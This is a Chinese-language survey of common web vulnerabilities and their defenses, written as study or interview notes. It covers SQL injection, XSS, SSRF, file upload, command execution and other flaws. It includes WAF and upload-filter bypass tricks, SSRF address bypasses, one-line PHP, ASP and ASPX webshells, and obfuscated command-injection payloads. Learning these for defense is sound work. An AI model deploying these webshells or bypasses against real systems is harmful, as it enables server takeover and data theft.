admin 管理员组文章数量: 887021
来源如下图:(微信公众号:0x00实验室)
00-TOP10漏洞
- SQL注入:可以在Web应用程序中使用恶意输入来执行未经授权的SQL查询,从而使攻击者能够访问、修改或删除数据库中的数据。
- 跨站点脚本漏洞 (XSS):允许攻击者通过向Web应用程序提交恶意代码,例如JavaScript,以窃取用户会话信息或对用户进行钓鱼攻击。
- 无法正确配置的安全设置:攻击者利用默认密码、管理员凭据或其他易受攻击的安全设置访问应用程序,从而导致数据泄露和系统崩溃等问题。
- 身份验证和会话管理漏洞:用户身份验证过程中的弱加密算法、显而易见的用户名和密码等漏洞。在实现过程中,SessionID易被截获或假冒,这也是一种非常危险的漏洞。
- 敏感数据泄露:包括用户信用卡号码、社会保险号码、个人身份证信息、银行账户信息等敏感数据的泄露,这可能会导致严重后果,如信用卡欺诈、身份盗窃等。
- 不安全的直接对象引用:攻击者可以通过修改Web应用程序的输入参数来访问属于其他用户的私密数据或功能。
- 输入验证缺陷:当用户提交恶意输入时,这些应用程序无法正确处理或验证它们,并有可能导致代码执行漏洞等。
- 不安全的加密传输:以明文形式通过HTTP/FTP协议进行的数据传输是非常容易受到网络劫持、中间人攻击和数据篡改的威胁。正确使用HTTPS协议对创建安全通信管道非常重要。
- 防御不足的API:在Web应用程序中使用的API往往是一种攻击面,攻击者可以通过查询API来了解有关应用程序内部的详细信息并发动攻击。
- 安全配置错误:包括弱口令、未打补丁的应用程序、未更新的操作系统和应用程序等。这些问题可能会导致大量漏洞的利用并使攻击者进入系统并窃取数据。
01-SQL注入漏洞
原理:
产生SQL 注入漏洞的根本原因在于代码中没有对用户输入项进行验证和处理便直接拼接 到查询语句中。利用SQL 注入漏洞,攻击者可以在应用的查询语句中插入自己的 SQL 代码并传递 给后台SQL 服务器时加以解析并执行
分类:
- 显注
- 盲注(无回显): 时间型、布尔型、报错型
危害:
- 数据库信息泄露
- 网页篡改
- 网站被挂马,传播恶意软件
- 数据库被恶意操作
- 服务器被植入后门
- 破坏硬盘或者服务器等硬件设备
如何进行SQL注入的防御
- 关闭应用的错误提示
- 加waf
- 对输入进行过滤
- 限制输入长度
- 限制好数据库权限,drop/create/truncate等权限谨慎grant
- 预编译好sql语句,python和Php中一般使用?作为占位符。这种方法是从编程框架方面解决利用占位符参数的sql注入,只能说一定程度上防止注入。还有缓存溢出、终止字符等。
- 数据库信息加密安全(引导到密码学方面)。不采用md5因为有彩虹表,一般是一次md5后加盐再md5
- 清晰的编程规范,结对/自动化代码review,加大量现成的解决方案 (PreparedStatement,ActiveRecord,歧义字符过滤, 只可访问存储过程balabala)已经让SQL注入的风险变得非常低了。
绕过技术:
- 关键字可以用%(只限 IIS 系列)。比如 select,可以 sel%e%ct
- 通杀的,内联注释,如 /*!select*/
- 编码,可两次编码
- multipart 请求绕过,在 POST 请求中添加一个上传文件,绕过了 绝大多数 WAF
- 参数绕过,复制参数,id=1&id=1
- 组合法 如 and 可以用&&再 URL 编码
- 替换法,如 and 改成&&;=可以用 like 或 in 等
02-CSRF漏洞
原理:
CSRF 跨站点请求伪造。攻击者盗用了受害者的身份,以受害者的名义发送恶意请求,对 服务器来说这个请求是完全合法的,但是却完成了攻击者所期望的一个操作
危害:
- 对网站管理员进行攻击
- 修改受害网站上的用户账户和数据
- 账户劫持
- 传播CSRF蠕虫进行大规模攻击
- 利用csrf进行拖库
- 利用其他漏洞进行组合拳攻击
- 针对路由器的csrf攻击
如何防护:
- 尽量使用POST,限制GET;
- 浏览器Cookie策略
- 加验证码;
- Referer Check ;
- Anti CSRF Token
03-文件包含漏洞
类型
- 本地文件包含
- 远程文件包含 :即加载远程文件,在`php.ini`中开allow_url_include 、 allow_url_fopen选项。开启后可以直接执行任意代码。
PHP文件包含函数
- include():使用此函数,只有代码执行到此函数时才将文件包含进来,发生错误时只警告并继续执行。
- inclue_once():功能和前者一样,区别在于当重复调用同一文件时,程序只调用一次。
- require():使用此函数,只要程序执行,立即调用此函数包含文件,发生错误时,会输出错误信息并立即终止程序。
- require_once():功能和前者一样,区别在于当重复调用同一文件时,程序只调用一次。
利用:
- 读取敏感文件
- 远程包含shell
- 图片上传并包含图片shenll
- 使用伪协议
- 包含日志文件GetShell
- 截断包含
修复方案
- 禁止远程文件包含allow_url_include=off
- 配置open_basedir=指定目录,限制访问区域。
- 过滤../等特殊符号
- 修改Apache日志文件的存放地址
- 开启魔术引号magic_quotes_qpc=on
- 尽量不要使用动态变量调用文件,直接写要包含的文件。
04-文件上传漏洞
原理:
由于程序员在对用户文件上传功能实现代码没有严格限制用户上传文件后缀
以及文件类型或者处理缺陷,而导致用户可以越过本身权限向服务器上传木马去控制服务器 .
危害
作木马文件提权 获取网站权限操
绕过方法:
1. 黑名单
a. 后缀名不完整 .php5 .phtml 等
b. 上传.htacess
c. 大小写
d. 在数据包中 后文件缀名前加空格
e. 后缀名前加 .
f. 加上 ::$DATA
g.未循环验证,可以使用 x.php.. 类似的方法
2. 白名单(一般需要配合其他漏洞一起利用)
a. %00截断
b. 图片马
c. 条件竞争
修复:
- 后端验证:采用服务端验证模式
- 后缀验证:基于白名单,黑名单过滤
- MIME验证:基于上传自带类型艰检测
- 内容检测:文件头,完整性检测
- 自带函数过滤
- WAF防护软件:宝塔、云盾等
05-SSRF漏洞
原理:
利用一个可以发起网络请求的服务当作跳板来攻击内部其他服务。
ssrf危害:
- 探测内网信息,用协议探`ftp%26ip={ip}%26port={port}`
- 攻击内网或本地其他服务
- 穿透防火墙
具体利用的方式:
具体操作需要查看支持的协议,file协议查看文件、 dict 协议探测端口、 ophergopher 协议 支持GET&POST 请求,同时在攻击内网 ftp 、 redis 、 telnet 、 Memcache 上有极大作用利用gopher 协议访问 redis 反弹 shell
漏洞存在的地方:
- 能够对外发起网络请求的地方
- 请求远程服务器资源的地方
- 数据库内置功能
- 邮件系统
- 文件处理
- 在线处理工具
举几个例子:
- 在线识图,在线文档翻译,分享,订阅等,这些有的都会发起网络请求。
- 根据远程URL上传,静态资源图片等,这些会请求远程服务器的资源。
- 数据库的比如mongodb的copyDatabase函数,这点看猪猪侠讲的吧,没实践过。
- 邮件系统就是接收邮件服务器地址这些地方。
- 文件就找ImageMagick,xml这些。
- 从URL关键字中寻找,比如:source,share,link,src,imageurl,target等。
绕过姿势
- http://example@127.0.0.1`
- 利用IP地址的省略写法绕过,[::]绕过localhost
- DNS解析 http://127.0.0.1.xip.io/可以指向任意ip的域名:xip.io
- 利用八进制IP地址绕过,利用十六进制IP地址,绕过利用十进制的IP地址绕过
修复:
- 地址做白名单处理
- 域名识别IP 过滤内部IP
- 校验返回的内容对比是否与假定的一致
06-逻辑漏洞
1)挖过的逻辑漏洞:订单任意金额修改
相同价格增加订单数量,相同订单数量减少产品价格,订单价格设定为负数。
预防思路:
- 订单需要多重效验
- 订单数值较大的时候需要人工审核
2)验证码回传
漏洞一般发生在账号密码找回、账号注册、支付订单等。验证码发送途径一般为手机短信、邮箱邮件
预防思路:
- response数据内不包含验证码,验证方式主要采取后端验证,但是缺点是服务器的运算压力也会随之增加
- 如果要进行前端验证的话也可以,但是需要进行加密
3)未进行登陆凭证验证
有些业务的接口,因为缺少了对用户的登陆凭证的效验或者是验证存在缺陷,导致黑客可以未经授权访问这些敏感信息甚至是越权操作。比如后台页面、订单ID枚举、敏感信息可下载、没验证ID 或 cookie 验证导致越权。
预防思路:
- 对敏感数据存在的接口和页面做cookie,ssid,token或者其它验证
4)接口无限制枚举
- 某电商登陆接口无验证导致撞库
- 某招聘网验证码无限制枚举
- 某快递公司优惠券枚举
- 某电商会员卡卡号枚举
预防思路:
- 在输入接口设置验证,如token,验证码等。如果设定验证码,最好不要单纯的采取一个前端验证,最好选择后端验证。如果设定token,请确保每个token只能采用一次,并且对 token设定时间参数。
- 注册界面的接口不要返回太多敏感信息,以防遭到黑客制作枚举字典。
- 验证码不要用短数字,尽量6位以上,最好是以字母加数字进行组合,并且验证码需要设定时间期限。
- 优惠券,VIP卡号请尽量不要存在规律性和简短性,并且优惠券最好是以数字加字母进行组合
5)cookie设置存在缺陷
- Cookie的效验值过于简单。有些web对于cookie的生成过于单一或者简单,导致黑客可以对cookie的效验值进行一个枚举.
- cookie存在被盗风险,即用户重置密码后使用老cookie依然可以通过验证
- 用户的cookie数据加密应严格使用标准加密算法,并注意密钥管理。不能采取简单的 base64等算法
- 越权:平行越权:权限类型不变,权限ID改变;垂直越权:权限ID不变,权限类型改变;交叉越权:即改变ID,也改变权限
预防思路
- cookie中设定多个验证,比如自如APP的cookie中,需要sign和ssid两个参数配对,才 能返回数据。
- 用户的cookie数据加密应严格使用标准加密算法,并注意密钥管理。
- 用户的cookie的生成过程中最好带入用户的密码,一旦密码改变,cookie的值也会改变。
- cookie中设定session参数,以防cookie可以长时间生效。
- 根据业务不同还有很多方法
07-XSS漏洞
原理:
通过插入恶意脚本,实现对用户浏览器的攻击
类型:
存储、反射、dom
反射和dom的区别:
DOM-XSS是javascript处理输出, 而反射性xss是后台程序处理
XSS绕过:
- 大小写
- js伪协议
- 没有分号
- Flash
- Html5新标签
- Fuzz进行测试
- 双层标签绕过
修复防御:
- 对输入内容的特定字符进行编码,例如表示html标记的 < > 等符号。
- 对重要的cookie设置httpOnly, 防止客户端通过document.cookie读取 cookie,此 HTTP头由服务端设置。
- 将不可信的值输出URL参数之前,进行URLEncode操作,而对于从URL参数中获取值一定要 进行格式检测(比如你需要的时URL,就判读是否满足URL格式)。
- 不要使用Eval来解析并运行不确定的数据或代码,对于JSON解析请使用 JSON.parse() 方法。
08 - XXE漏洞
原理: 解析用户传入的xml
作用: 内网端口扫描、利用file协议等读取文件、攻击内网web应用使用
get(struts2等)
危害:
1.导致可以加载恶意外部文件
2.造成文件读取
3.内网端口扫描
4.攻击内网网站
5.发起dos攻击等危害
防御: 过滤用户提交的XML数据、如果你当前使用的程序为PHP,则可以将
libxml_disable_entity_loader设置为TRUE来禁用外部实体,从而起到防御的目的
09 - 代码执行漏洞
原理:没有对接口输入的内容进行严格的判断 造成攻击者精心构造的代码非法执行
当应用在调用一些能将字符转化为代码的函数(如PHP中的eval)时,没有考虑用户是否能控 制这个字符串,这就会造成代码执行漏洞。
相关函数:
PHP:eval assert
Python:exec
asp:<%=CreateObject(“wscript.shell”).exec(“cmd.exe /c
ipconfig”).StdOut.ReadAll()%>
危害:
- 执行代码
- 让网站写shell
- 甚至控制服务器
漏洞利用:
- 执行代码的函数:eval、assert
- callback函数:preg_replace + /e模式
- 反序列化:unserialize()(反序列化函数)
防御修复:
- 使用json保存数组,当读取时就不需要使用eval了
- 对于必须使用eval的地方,一定严格处理用户数据
- 字符串使用单引号包括可控代码,插入前使用addslashes转义
- 放弃使用preg_replace的e修饰符,使用preg_replace_callback()替换
- 若必须使用preg_replace的e修饰符,则必用单引号包裹正则匹配出的对象
10.关于路径覆盖漏洞(不常问)
RPO的全称为Relative Path Overwrite,也就是相对路径覆盖,利用客户端和服务端的差
异,通过相对路径来引入我们想要的js或css文件,从而实现某种攻击。
就目前来看此攻击方法依赖于浏览器和网络服务器的反应,基于服务器的Web缓存技术和配置差异,以及服务器和客户端浏览器的解析差异,利用前端代码中加载的css/js的相对路径来加载其他文件,最终浏览器将服务器返回的不是css/js的文件当做css/js来解析,从而导致XSS,信息泄露等漏洞产生。
11.邮件系统漏洞攻击
漏洞攻击是危害网络安全中较为常见的一种。作为当今世界上使用最为频繁的商务通信工具—— 邮件系统,更是屡屡遭受漏洞攻击的困扰,这不仅因为制造漏洞的途径多,还以为邮件系统的 互联网通信协议本身的问题。前者如程序员因为工作失误出现编码漏洞,毕竟人非机器,在紧 张复杂的工作过程中,难免有个闪失,除了人为因素,还有软件编码工具及编译器造成的错 误,不同应用程序彼此之间的相互作用,如大多数程序必须与其它API相交互,保存并检索文 件,同时运行在多种不同类型的设备上,都会可能产生漏洞;后者如互联网通信协议—TCP和 UDP,其开放性常常引来黑客的攻击;而IP地址的脆弱性,也给黑客的伪造提供了可能,从而泄露远程服务器的资源信息。
除了以上原因,据业界知名邮件通联服务商U-Mail专家张工分析,常见漏洞大概可分为几种:
一、IMAP 和 POP 漏洞:
这些协议常见弱点是密码脆弱,同时,各种IMAP和POP服务还容易受到如缓冲区溢出等类型的 攻击。
二、拒绝服务(DoS)攻击:
- 死亡之Ping——发送一个无效数据片段,该片段始于包结尾之前,但止于包结尾之后;
- 同步攻击——极快地发送TCP SYN包(它会启动连接),使受攻击的机器耗尽系统资源,进而中断合法连接;
- 循环——发送一个带有完全相同的源/目的地址/端口的伪造SYN包,使系统陷入一个试图完成TCP连接的无限循环中。
三、系统配置漏洞:
- 默认配置——大多数系统在交付给客户时都设置了易于使用的默认配置,被黑客盗用变得轻松;
- 空的/默认根密码——许多机器都配置了空的或默认的根/管理员密码,并且其数量多得惊人;
- 漏洞创建——几乎所有程序都可以配置为在不安全模式下运行,这会在系统上留下不必要的漏洞。
四、利用软件问题:在服务器守护程序、客户端应用程序、操作系统和网络堆栈中,存在很多 的软件错误,分为以下几类:
- 缓冲区溢出——程序员会留出一定数目的字符空间来容纳登录用户名,黑客则会通过发送比指定字符串长的字符串,其中包括服务器要执行的代码,使之发生数据溢出,造成系统入侵。
- 意外组合——程序通常是用很多层代码构造而成的,入侵者可能会经常发送一些对于某一层毫 无意义,但经过适当构造后对其他层有意义的输入。
- 未处理的输入——大多数程序员都不考虑输入不符合规范的信息时会发生什么。
12-DNS欺骗是什么?
定义:
DNS欺骗就是攻击者冒充域名服务器的一种欺骗行为。
原理:
如果可以冒充域名服务器,然后把查询的IP地址设为攻击者的IP地址,这样的话,用户上网就只能看到攻击者的主页,而不是用户想要取得的网站的主页了,这就是DNS欺骗的基本原理。
DNS欺骗其实并不是真的“黑掉”了对方的网站,而是冒名顶替、招摇撞骗罢了。
13-DDOS攻击
分布式拒绝服务攻击(DDoS)是目前黑客经常采用而难以防范的攻击手段。DoS的攻击方式有 很多种,最基本的DoS攻击就是利用合理的服务请求来占用过多的服务资源,从而使合法用户 无法得到服务的响应。
抗D思想和方案
- 负载均衡
- 花钱买流量清洗服务
- CDN:web层,比如cc攻击
- 分布式集群防御
- 高防:防大部分攻击,udp、大型的cc攻击
预防为主
- 系统漏洞
- 系统资源优化:
- 过滤不必要的服务和端口
- 限制特定流量:检查访问来源做适当限制
14-什么是CC攻击?
CC攻击是DDOS(分布式拒绝服务)的一种,相比其它的DDOS攻击CC似乎更有技术含量一些。这种攻击你见不到真实源IP,见不到特别大的异 常流量,但造成服务器无法进行正常连接。
原理:
攻击者控制某些主机不停地发大量数据包给对方服务器造成服务器资源耗尽, 一直到宕机溃。CC主要是用来攻击页面的, 每个人都有这样的体验:当一个网页访问的人数特别多的时候,打开网页就慢了,CC就是模拟多个用户(多少线程就是多少用户)不停地进行访问那些需要大量数据操作(就是需要大量 CPU时间)的页面,造成服务器资源的浪费,CPU长时间处100%,永远都有处理不完的连接直至就网络拥塞,正常的访问被中止。
15-常见的端口和对应的服务
1)web类
这部分常有的漏洞有:(web漏洞/敏感目录)
第三方通用组件漏洞 80端口 80-89端口 8000-9090端口 struts、thinkphp、jboss、ganglia、zabbix web web web 2)数据库类(扫描弱口令)
1433端口 1521端口 3306端口 5432端口 MSSQL Oracle MySQL PostgreSQL 3)特殊服务类(未授权/命令执行/漏洞)
端口 漏洞 443 SSL心脏滴血 873 Rsync未授权 5984 CouchDB http://xxx:5984/_utils/ 6379 redis未授权 7001、7002 weblogic默认弱口令、反序列化 9200、9300 elasticsearch 参考乌云:多玩某服务器ElasticSearch命令执行漏洞 11211 memcache未授权访问 50000 SAP命令执行 50070、50030 hadoop默认端口未授权访问 4、常用端口类(扫描弱口令/端口爆破)
端口 服务 21 ftp 22 ssh 23 telnet(远程管理) 2601、2604 zebra路由,默认密码zebra 3389 远程桌面 常见的端口漏洞
端口 漏洞 21 ftp FTP服务端有很多 anonymous 匿名未授权访问 爆破 22 ssh root密码爆破 后门用户 可以google查一些关于ssh后门的文章 里面的默认密码 可能会登入进去 23 telnet 一般会发生在 路由器 或者交换机 嵌入式设备 管理端口 攻击方法 弱口令 25 smtp 默认用户 默认密码 邮件账号爆破 80 http web 常见的Owasp top 10 中间件反序列化 中间件溢出 fastcgi配置不当造成fastcgi端口泄露 110 pop3 默认用户 默认密码 邮件账号爆破 443 https openssl 心脏滴血(影响范围较小) SSL/TLS低版本存在的漏洞 135、139 、445 netbios、smb、MS17010(永恒之蓝) 3389 RDP(远程桌面)、CVE-2019-0708 3389和443、445有什么漏洞?
端口 漏洞 445 ms06_040,蠕虫,勒索病毒、MS17-010(永恒之蓝) 443 ssl心脏滴血 3389 rdp漏洞、弱口令、cve-2019-0708、ms12-20 端口合计详情
端口 详情 161 SNMP 389 LDAP
512、513、514 Rexec 873 Rsync未授权 1025、1111 NSF 1433 sqlserver 1521 Oracle:(iSqlPlus port:5560、7778) 2082/2083 cpanel主机管理系统登录 2222 DA虚拟主机管理系统登录 2601、2604 zebra路由,默认密码zebra 3128 squid代理默认端口,如果没设置口令很可能直接漫游内网 3306 Mysql 3312/3311 kangle主机管理系统登录 4440 rundeck 参考乌云:借用新浪某服务成功漫游新浪内网 5432 PostgreSQL 5900 vnc 5984 CouchDB 6082 varnish 6379 redis未授权 7001、7002 weblogic默认弱口令、反序列化 7778 kloxo主机控制面板登录 8000-9090 都是一些常见的web端口,有些运维谢欢吧管理后台开放在这些非80端口上 8080 tomcat/wDCP主机管理系统,默认弱口令 8080、8089、9090 jboss 8083 Vestacp主机管理系统 8649 ganglia 8888 amh/LuManager 主机管理系统默认端口 9200、9300 elasticsearch 参考乌云:多玩某服务器ElasticSearch命令执行漏洞 10000 Virtualmin/Webmin 服务器虚拟主机管理系统 11211 memcache未授权访问 27017、27018 Mongodb未授权访问 28017 mongodb统计页面 50000 SAP命令执行 50070、50030 hadoop默认端口未授权访问
16-身份认证漏洞最常见是?
1)会话固定攻击(参考)
什么是会话固定攻击?英文叫做 session fixation attack。
正常来说,只要你不关闭浏览器,并且服务端的 HttpSession 也没有过期,那么维系服务端和浏览器的 sessionid 是不会发生变化的,而会话固定攻击,则是利用这一机制,借助受害者用相同的会话 ID 获取认证和授权,然后利用该会话 ID 劫持受害者的会话以成功冒充受害者,造成会话固定攻击。
一般来说,会话固定攻击的流程是这样,以淘宝为例:
- 攻击者自己可以正常访问淘宝网站,在访问的过程中,淘宝网站给攻击者分配了一个 sessionid。
- 攻击者利用自己拿到的 sessionid 构造一个淘宝网站的链接,并把该链接发送给受害者。
- 受害者使用该链接登录淘宝网站(该链接中含有 sessionid),登录成功后,一个合法的会话就成功建立。
- 攻击者利用手里的 sessionid 冒充受害者。
2)cookie仿冒
只要得到session和cookie即可伪造用户身份.
17-验证码漏洞
1.验证码漏洞存在暴力破解
2.可以通过js或改包方法进行绕过
18-DOM 型XSS人工测试
人工测试思路:找到类似 document.write、innerHTML赋值、outterHTML 赋值、
window.location 操作、写javascript:后内容、eval、setTimeout 、
setInterval 等直接执行之类的函数点。找到其变量,回溯变量来源观察是否可控,是否经
过安全函数。
19-为什么参数化查询可以防止SQL注入?
原理:
使用参数化查询数据库服务器不会把参数的内容当作sql指令的一部分来执行,是在数
据库完成sql指令的编译后才套用参数运行(参数:@变量名称)
简单的说:
参数化能防注入的原因在于:语句是语句,参数是参数,参数的值并不是语句的一
部分,数据库只按语句的语义跑
20.各种常见的状态码?
200 OK // 客户端请求成功
403 Forbidden // 服务器收到请求,但是拒绝提供服务
404 Not Found // 请求资源不存在,eg:输入了错误的 URL
500 Internal Server Error // 服务器发生不可预期的错误
21-Dll劫持漏洞
由于输入表中只包含DLL名而没有它的路径名,因此加载程序必须在磁盘上搜索 DLL 文件。首先会尝试从当前程序所在的目录加载DLL,如果没找到,则在 Windows系统目录中查找,最后是在环境变量中列出的各个目录下查找。利用这个特点,先伪造一个系统同名的DLL,提供同样的输出表,每个输出函数转向真正的系统DLL。程序调用系统DLL时会先调用当前目录下伪造的 DLL,完成相关功能后,再 跳到系统DLL同名函数里执行。这个过程用个形象的词来描述,就是系统DLL被劫持(hijack)了。伪造的dll制作好后,放到程序当前目录下,这样当原程序调用原函数时就调 用了伪造的dll的同名函数,进入劫持DLL的代码,处理完毕后,再调用原DLL此函数。
DLL劫持利用系统未知DLL的搜索路径方式,使得程序加载当前目录下的系统同名DLL。所以可 以告诉系统DLL的位置,改变加载系统DLL的顺序不是当前目录,而是直接到系统目录下查找。
22-一句话木马
asp一句话木马: <%execute(request("value"))%>
php一句话木马:<?php @eval($_POST[value]);?>
变形:<?php $x=$_GET[‘z’];@eval(“$x;”);?>
aspx一句话木马:
<%@ PageLanguage="Jscript"%>
<%eval(Request.Item["value"])%>
23-命令执行漏洞
绕过技巧:
cat 233.txt # 管道符号绕过
# 空格绕过 ${IFS}
# %0a、%09#重定向绕过<<>
# 变量拼接绕过 @kali : $a=c;b=at;c=fl;d=ag;$a$b $c$d
# 单引号、双引号绕过 ca'' t flag cat"" flag
# 编码绕过
$(printf"\x63\x61\x74\x20\x2f\x66\x6c\x61\x67")==>cat/flag
#{printf,"\x63\x61\x74\x20\x2f\x66\x6c\x61\x67"}|\$0 ==>cat /flag
#$(printf "\154\163") ==>ls
$(printf "\154\163")
# 查看等价替换
- more:一页一页的显示档案内容
- less:与more类似,但是比more更好的是,他可以[pg dn][pg up]翻页
- head:查看头几行
- tac:从最后一行开始显示,可以看出tac是cat的反向显示
- tail:查看尾几行
- nl:显示的时候,顺便输出行号
- od:以二进制的方式读取档案内容
- vi:一种编辑器
- vim:一种编辑器
- sort:可以查看
- uniq:可以查看
- file -f:报错出具体内容
# 反斜线绕过 c \at fl\ag
# 内敛注释绕过 #`命令`和$(命令)都是执行命令的方式 echo "m0re`cat flag`"
echo "m0re $(cat flag)"
# base64编码绕过 `echo "Y2F0IGZsYWc=" |base64 -d`
# 绕过长度限制
# >命令会将原有文件内容覆盖 echo '123'>xxoo.txt # >>符号的作用是将字符串添
加到文件内容末尾,不会覆盖原内容 echo '233' >> xxoo.txt
# 命令换行绕过
ca\
a\
版权声明:本文标题:0x00.基础漏洞篇 内容由网友自发贡献,该文观点仅代表作者本人, 转载请联系作者并注明出处:http://www.freenas.com.cn/jishu/1725919341h892732.html, 本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌抄袭侵权/违法违规的内容,一经查实,本站将立刻删除。
发表评论